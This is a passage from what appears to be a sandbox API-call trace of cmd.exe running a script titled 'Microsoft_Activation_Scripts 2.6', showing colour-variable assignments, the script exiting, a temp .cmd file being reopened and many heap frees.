(HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ffec0) returned 1 [0177.199] GetEnvironmentStringsW () returned 0x19a8f1ffec0* [0177.199] GetProcessHeap () returned 0x19a8f1e0000 [0177.199] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xd02) returned 0x19a8f200bd0 [0177.199] memcpy (in: _Dst=0x19a8f200bd0, _Src=0x19a8f1ffec0, _Size=0xd02 | out: _Dst=0x19a8f200bd0) returned 0x19a8f200bd0 [0177.199] FreeEnvironmentStringsA (penv="=") returned 1 [0177.199] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efde70, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0177.200] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0177.200] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0177.200] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0177.200] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0177.200] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0177.200] _wcsicmp (_String1="set", _String2="CD") returned 16 [0177.200] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0177.200] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0177.201] _wcsicmp (_String1="set", _String2="REN") returned 1 [0177.201] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0177.201] _wcsicmp (_String1="set", _String2="SET") returned 0 [0177.201] GetProcessHeap () returned 0x19a8f1e0000 [0177.201] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x60) returned 0x19a8f1e5e10 [0177.201] GetProcessHeap () returned 0x19a8f1e0000 [0177.201] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1e5e10, Size=0x34) returned 0x19a8f1e5e10 [0177.201] GetProcessHeap () returned 0x19a8f1e0000 [0177.201] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1e5e10) returned 0x34 [0177.201] wcsncmp (_String1="\"_Bl", _String2="/", _MaxCount=0x4) returned -13 [0177.201] GetProcessHeap () returned 0x19a8f1e0000 [0177.201] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x40) returned 0x19a8f1f9310 [0177.201] _wcsnicmp (_String1="\"_", _String2="/A", _MaxCount=0x2) returned -13 [0177.201] _wcsnicmp (_String1="\"_", _String2="/P", _MaxCount=0x2) returned -13 [0177.201] SetEnvironmentVariableW (lpName="_Blue", lpValue="\"40;94m\"") returned 1 [0177.201] GetProcessHeap () returned 0x19a8f1e0000 [0177.202] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f200bd0) returned 1 [0177.202] GetEnvironmentStringsW () returned 0x19a8f1eeb50* [0177.202] GetProcessHeap () returned 0x19a8f1e0000 [0177.202] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xd20) returned 0x19a8f1ffec0 [0177.202] memcpy (in: _Dst=0x19a8f1ffec0, _Src=0x19a8f1eeb50, _Size=0xd20 | out: _Dst=0x19a8f1ffec0) returned 0x19a8f1ffec0 [0177.202] FreeEnvironmentStringsA (penv="=") returned 1 [0177.202] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efdde0, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0177.203] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0177.203] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0177.203] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0177.203] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0177.203] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0177.203] _wcsicmp (_String1="set", _String2="CD") returned 16 [0177.203] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0177.203] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0177.203] _wcsicmp (_String1="set", _String2="REN") returned 1 [0177.203] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0177.203] _wcsicmp (_String1="set", _String2="SET") returned 0 [0177.203] GetProcessHeap () returned 0x19a8f1e0000 [0177.203] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x60) returned 0x19a8f1e5e60 [0177.203] GetProcessHeap () returned 0x19a8f1e0000 [0177.203] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1e5e60, Size=0x36) returned 0x19a8f1e5e60 [0177.203] GetProcessHeap () returned 0x19a8f1e0000 [0177.203] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1e5e60) returned 0x36 [0177.203] wcsncmp (_String1="\"_Wh", _String2="/", _MaxCount=0x4) returned -13 [0177.203] GetProcessHeap () returned 0x19a8f1e0000 [0177.204] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x40) returned 0x19a8f1f90e0 [0177.204] _wcsnicmp (_String1="\"_", _String2="/A", _MaxCount=0x2) returned -13 [0177.204] _wcsnicmp (_String1="\"_", _String2="/P", _MaxCount=0x2) returned -13 [0177.204] SetEnvironmentVariableW (lpName="_White", lpValue="\"40;37m\"") returned 1 [0177.204] GetProcessHeap () returned 0x19a8f1e0000 [0177.205] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ffec0) returned 1 [0177.205] GetEnvironmentStringsW () returned 0x19a8f1ffec0* [0177.205] GetProcessHeap () returned 0x19a8f1e0000 [0177.205] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xd40) returned 0x19a8f200c10 [0177.205] memcpy (in: _Dst=0x19a8f200c10, _Src=0x19a8f1ffec0, _Size=0xd40 | out: _Dst=0x19a8f200c10) returned 0x19a8f200c10 [0177.205] FreeEnvironmentStringsA (penv="=") returned 1 [0177.205] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efdd50, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0177.206] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0177.206] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0177.206] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0177.206] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0177.206] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0177.206] _wcsicmp (_String1="set", _String2="CD") returned 16 [0177.206] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0177.206] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0177.206] _wcsicmp (_String1="set", _String2="REN") returned 1 [0177.206] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0177.206] _wcsicmp (_String1="set", _String2="SET") returned 0 [0177.206] GetProcessHeap () returned 0x19a8f1e0000 [0177.206] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x60) returned 0x19a8f1e5eb0 [0177.206] GetProcessHeap () returned 0x19a8f1e0000 [0177.206] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1e5eb0, Size=0x38) returned 0x19a8f1e5eb0 [0177.206] GetProcessHeap () returned 0x19a8f1e0000 [0177.206] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1e5eb0) returned 0x38 [0177.206] wcsncmp (_String1="\"_Ye", _String2="/", _MaxCount=0x4) returned -13 [0177.206] GetProcessHeap () returned 0x19a8f1e0000 [0177.206] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x40) returned 0x19a8f1f8fa0 [0177.206] _wcsnicmp (_String1="\"_", _String2="/A", _MaxCount=0x2) returned -13 [0177.206] _wcsnicmp (_String1="\"_", _String2="/P", _MaxCount=0x2) returned -13 [0177.207] SetEnvironmentVariableW (lpName="_Yellow", lpValue="\"40;93m\"") returned 1 [0177.207] GetProcessHeap () returned 0x19a8f1e0000 [0177.208] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f200c10) returned 1 [0177.208] GetEnvironmentStringsW () returned 0x19a8f1eeb50* [0177.208] GetProcessHeap () returned 0x19a8f1e0000 [0177.208] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xd62) returned 0x19a8f1ffec0 [0177.208] memcpy (in: _Dst=0x19a8f1ffec0, _Src=0x19a8f1eeb50, _Size=0xd62 | out: _Dst=0x19a8f1ffec0) returned 0x19a8f1ffec0 [0177.208] FreeEnvironmentStringsA (penv="=") returned 1 [0177.208] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efdd80, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0177.209] _wcsicmp (_String1="exit", _String2="DIR") returned 1 [0177.209] _wcsicmp (_String1="exit", _String2="ERASE") returned 6 [0177.209] _wcsicmp (_String1="exit", _String2="DEL") returned 1 [0177.209] _wcsicmp (_String1="exit", _String2="TYPE") returned -15 [0177.209] _wcsicmp (_String1="exit", _String2="COPY") returned 2 [0177.209] _wcsicmp (_String1="exit", _String2="CD") returned 2 [0177.209] _wcsicmp (_String1="exit", _String2="CHDIR") returned 2 [0177.209] _wcsicmp (_String1="exit", _String2="RENAME") returned -13 [0177.209] _wcsicmp (_String1="exit", _String2="REN") returned -13 [0177.209] _wcsicmp (_String1="exit", _String2="ECHO") returned 21 [0177.209] _wcsicmp (_String1="exit", _String2="SET") returned -14 [0177.209] _wcsicmp (_String1="exit", _String2="PAUSE") returned -11 [0177.209] _wcsicmp (_String1="exit", _String2="DATE") returned 1 [0177.209] _wcsicmp (_String1="exit", _String2="TIME") returned -15 [0177.209] _wcsicmp (_String1="exit", _String2="PROMPT") returned -11 [0177.209] _wcsicmp (_String1="exit", _String2="MD") returned -8 [0177.209] _wcsicmp (_String1="exit", _String2="MKDIR") returned -8 [0177.209] _wcsicmp (_String1="exit", _String2="RD") returned -13 [0177.209] _wcsicmp (_String1="exit", _String2="RMDIR") returned -13 [0177.209] _wcsicmp (_String1="exit", _String2="PATH") returned -11 [0177.209] _wcsicmp (_String1="exit", _String2="GOTO") returned -2 [0177.209] _wcsicmp (_String1="exit", _String2="SHIFT") returned -14 [0177.209] _wcsicmp (_String1="exit", _String2="CLS") returned 2 [0177.209] _wcsicmp (_String1="exit", _String2="CALL") returned 2 [0177.210] _wcsicmp (_String1="exit", _String2="VERIFY") returned -17 [0177.210] _wcsicmp (_String1="exit", _String2="VER") returned -17 [0177.210] _wcsicmp (_String1="exit", _String2="VOL") returned -17 [0177.210] _wcsicmp (_String1="exit", _String2="EXIT") returned 0 [0177.210] GetProcessHeap () returned 0x19a8f1e0000 [0177.210] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1eb9e0 [0177.210] GetProcessHeap () returned 0x19a8f1e0000 [0177.210] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eb9e0, Size=0x1a) returned 0x19a8f1eb920 [0177.210] GetProcessHeap () returned 0x19a8f1e0000 [0177.210] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb920) returned 0x1a [0177.210] GetProcessHeap () returned 0x19a8f1e0000 [0177.210] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x22) returned 0x19a8f1eb9e0 [0177.210] _wcsnicmp (_String1="/b", _String2="/B", _MaxCount=0x2) returned 0 [0177.210] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efd7e0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x84 [0177.210] _open_osfhandle (_OSFileHandle=0x84, _Flags=8) returned 3 [0177.211] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.211] SetFilePointer (in: hFile=0x84, lDistanceToMove=355603, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x56d13 [0177.211] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.211] GetFileSize (in: hFile=0x84, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6d9ee [0177.211] _wcsnicmp (_String1=":EOF", _String2=":EOF", _MaxCount=0x4) returned 0 [0177.211] _close (_FileHandle=3) returned 0 [0177.211] _get_osfhandle (_FileHandle=1) returned 0x24 [0177.211] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0177.212] _get_osfhandle (_FileHandle=1) returned 0x24 [0177.212] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0177.212] _get_osfhandle (_FileHandle=0) returned 0x20 [0177.212] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0177.213] SetConsoleInputExeNameW () returned 0x1 [0177.213] GetConsoleOutputCP () returned 0x1b5 [0177.213] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0177.213] SetThreadUILanguage (LangId=0x0) returned 0x409 [0177.214] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efe870, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x84 [0177.214] _open_osfhandle (_OSFileHandle=0x84, _Flags=8) returned 3 [0177.214] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.214] SetFilePointer (in: hFile=0x84, lDistanceToMove=449006, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6d9ee [0177.214] GetProcessHeap () returned 0x19a8f1e0000 [0177.215] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb9e0) returned 1 [0177.215] GetProcessHeap () returned 0x19a8f1e0000 [0177.215] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb920) returned 1 [0177.216] GetProcessHeap () returned 0x19a8f1e0000 [0177.216] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f8fa0) returned 1 [0177.216] GetProcessHeap () returned 0x19a8f1e0000 [0177.217] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e5eb0) returned 1 [0177.217] GetProcessHeap () returned 0x19a8f1e0000 [0177.217] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f90e0) returned 1 [0177.217] GetProcessHeap () returned 0x19a8f1e0000 [0177.217] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e5e60) returned 1 [0177.217] GetProcessHeap () returned 0x19a8f1e0000 [0177.218] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f9310) returned 1 [0177.218] GetProcessHeap () returned 0x19a8f1e0000 [0177.218] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e5e10) returned 1 [0177.218] GetProcessHeap () returned 0x19a8f1e0000 [0177.219] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f94f0) returned 1 [0177.219] GetProcessHeap () returned 0x19a8f1e0000 [0177.219] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f0560) returned 1 [0177.219] GetProcessHeap () returned 0x19a8f1e0000 [0177.219] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f93b0) returned 1 [0177.219] GetProcessHeap () returned 0x19a8f1e0000 [0177.220] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f0510) returned 1 [0177.220] GetProcessHeap () returned 0x19a8f1e0000 [0177.220] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f94a0) returned 1 [0177.220] GetProcessHeap () returned 0x19a8f1e0000 [0177.221] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f04c0) returned 1 [0177.221] GetProcessHeap () returned 0x19a8f1e0000 [0177.221] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f9090) returned 1 [0177.221] GetProcessHeap () returned 0x19a8f1e0000 [0177.221] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f0470) returned 1 [0177.222] GetProcessHeap () returned 0x19a8f1e0000 [0177.222] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f95e0) returned 1 [0177.222] GetProcessHeap () returned 0x19a8f1e0000 [0177.222] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eda90) returned 1 [0177.222] GetProcessHeap () returned 0x19a8f1e0000 [0177.223] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f9220) returned 1 [0177.223] GetProcessHeap () returned 0x19a8f1e0000 [0177.223] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eaf60) returned 1 [0177.223] GetProcessHeap () returned 0x19a8f1e0000 [0177.224] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f8ff0) returned 1 [0177.224] GetProcessHeap () returned 0x19a8f1e0000 [0177.225] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e08b0) returned 1 [0177.225] GetProcessHeap () returned 0x19a8f1e0000 [0177.225] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f9590) returned 1 [0177.225] GetProcessHeap () returned 0x19a8f1e0000 [0177.226] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eaf10) returned 1 [0177.226] GetProcessHeap () returned 0x19a8f1e0000 [0177.226] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f92c0) returned 1 [0177.226] GetProcessHeap () returned 0x19a8f1e0000 [0177.227] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eaed0) returned 1 [0177.227] GetProcessHeap () returned 0x19a8f1e0000 [0177.228] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f9360) returned 1 [0177.228] GetProcessHeap () returned 0x19a8f1e0000 [0177.228] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0bf0) returned 1 [0177.228] GetProcessHeap () returned 0x19a8f1e0000 [0177.229] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ffe10) returned 1 [0177.229] GetProcessHeap () returned 0x19a8f1e0000 [0177.229] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ffdd0) returned 1 [0177.229] GetProcessHeap () returned 0x19a8f1e0000 [0177.229] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecd80) returned 1 [0177.229] GetProcessHeap () returned 0x19a8f1e0000 [0177.229] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecc40) returned 1 [0177.229] GetProcessHeap () returned 0x19a8f1e0000 [0177.229] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecb40) returned 1 [0177.229] GetProcessHeap () returned 0x19a8f1e0000 [0177.230] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f8820) returned 1 [0177.230] GetProcessHeap () returned 0x19a8f1e0000 [0177.230] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec8a0) returned 1 [0177.230] GetProcessHeap () returned 0x19a8f1e0000 [0177.230] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb980) returned 1 [0177.230] GetProcessHeap () returned 0x19a8f1e0000 [0177.230] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ff790) returned 1 [0177.230] GetProcessHeap () returned 0x19a8f1e0000 [0177.231] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fe4d0) returned 1 [0177.231] GetProcessHeap () returned 0x19a8f1e0000 [0177.231] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0fb0) returned 1 [0177.231] GetProcessHeap () returned 0x19a8f1e0000 [0177.231] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecb20) returned 1 [0177.231] GetProcessHeap () returned 0x19a8f1e0000 [0177.232] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fec50) returned 1 [0177.232] GetProcessHeap () returned 0x19a8f1e0000 [0177.232] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fe050) returned 1 [0177.232] GetProcessHeap () returned 0x19a8f1e0000 [0177.232] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0f70) returned 1 [0177.233] GetProcessHeap () returned 0x19a8f1e0000 [0177.233] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecae0) returned 1 [0177.233] GetProcessHeap () returned 0x19a8f1e0000 [0177.233] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ff010) returned 1 [0177.233] GetProcessHeap () returned 0x19a8f1e0000 [0177.233] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ff850) returned 1 [0177.233] GetProcessHeap () returned 0x19a8f1e0000 [0177.234] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0ef0) returned 1 [0177.234] GetProcessHeap () returned 0x19a8f1e0000 [0177.234] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eca40) returned 1 [0177.234] GetProcessHeap () returned 0x19a8f1e0000 [0177.235] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ff9d0) returned 1 [0177.235] GetProcessHeap () returned 0x19a8f1e0000 [0177.235] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fded0) returned 1 [0177.235] GetProcessHeap () returned 0x19a8f1e0000 [0177.235] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e09f0) returned 1 [0177.236] GetProcessHeap () returned 0x19a8f1e0000 [0177.236] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecac0) returned 1 [0177.236] GetProcessHeap () returned 0x19a8f1e0000 [0177.236] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fed10) returned 1 [0177.236] GetProcessHeap () returned 0x19a8f1e0000 [0177.236] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1feb90) returned 1 [0177.236] GetProcessHeap () returned 0x19a8f1e0000 [0177.237] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0f30) returned 1 [0177.237] GetProcessHeap () returned 0x19a8f1e0000 [0177.237] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecd40) returned 1 [0177.237] GetProcessHeap () returned 0x19a8f1e0000 [0177.237] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fead0) returned 1 [0177.237] GetProcessHeap () returned 0x19a8f1e0000 [0177.238] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fe350) returned 1 [0177.238] GetProcessHeap () returned 0x19a8f1e0000 [0177.238] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0cb0) returned 1 [0177.238] GetProcessHeap () returned 0x19a8f1e0000 [0177.238] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec6e0) returned 1 [0177.238] GetProcessHeap () returned 0x19a8f1e0000 [0177.238] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ff490) returned 1 [0177.238] GetProcessHeap () returned 0x19a8f1e0000 [0177.239] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edb90) returned 1 [0177.239] GetProcessHeap () returned 0x19a8f1e0000 [0177.239] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0a70) returned 1 [0177.239] GetProcessHeap () returned 0x19a8f1e0000 [0177.239] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec680) returned 1 [0177.239] GetProcessHeap () returned 0x19a8f1e0000 [0177.240] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee9d0) returned 1 [0177.240] GetProcessHeap () returned 0x19a8f1e0000 [0177.240] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee910) returned 1 [0177.240] GetProcessHeap () returned 0x19a8f1e0000 [0177.241] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0ab0) returned 1 [0177.241] GetProcessHeap () returned 0x19a8f1e0000 [0177.241] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecaa0) returned 1 [0177.241] GetProcessHeap () returned 0x19a8f1e0000 [0177.241] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee190) returned 1 [0177.241] GetProcessHeap () returned 0x19a8f1e0000 [0177.241] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eddd0) returned 1 [0177.241] GetProcessHeap () returned 0x19a8f1e0000 [0177.242] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0df0) returned 1 [0177.242] GetProcessHeap () returned 0x19a8f1e0000 [0177.242] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec940) returned 1 [0177.242] GetProcessHeap () returned 0x19a8f1e0000 [0177.242] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee490) returned 1 [0177.242] GetProcessHeap () returned 0x19a8f1e0000 [0177.242] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edc50) returned 1 [0177.243] GetProcessHeap () returned 0x19a8f1e0000 [0177.243] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0a30) returned 1 [0177.243] GetProcessHeap () returned 0x19a8f1e0000 [0177.243] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec780) returned 1 [0177.243] GetProcessHeap () returned 0x19a8f1e0000 [0177.243] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee010) returned 1 [0177.243] GetProcessHeap () returned 0x19a8f1e0000 [0177.244] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee250) returned 1 [0177.244] GetProcessHeap () returned 0x19a8f1e0000 [0177.244] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f9270) returned 1 [0177.244] GetProcessHeap () returned 0x19a8f1e0000 [0177.244] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecc20) returned 1 [0177.244] GetProcessHeap () returned 0x19a8f1e0000 [0177.244] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edf50) returned 1 [0177.244] GetProcessHeap () returned 0x19a8f1e0000 [0177.245] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee6d0) returned 1 [0177.245] 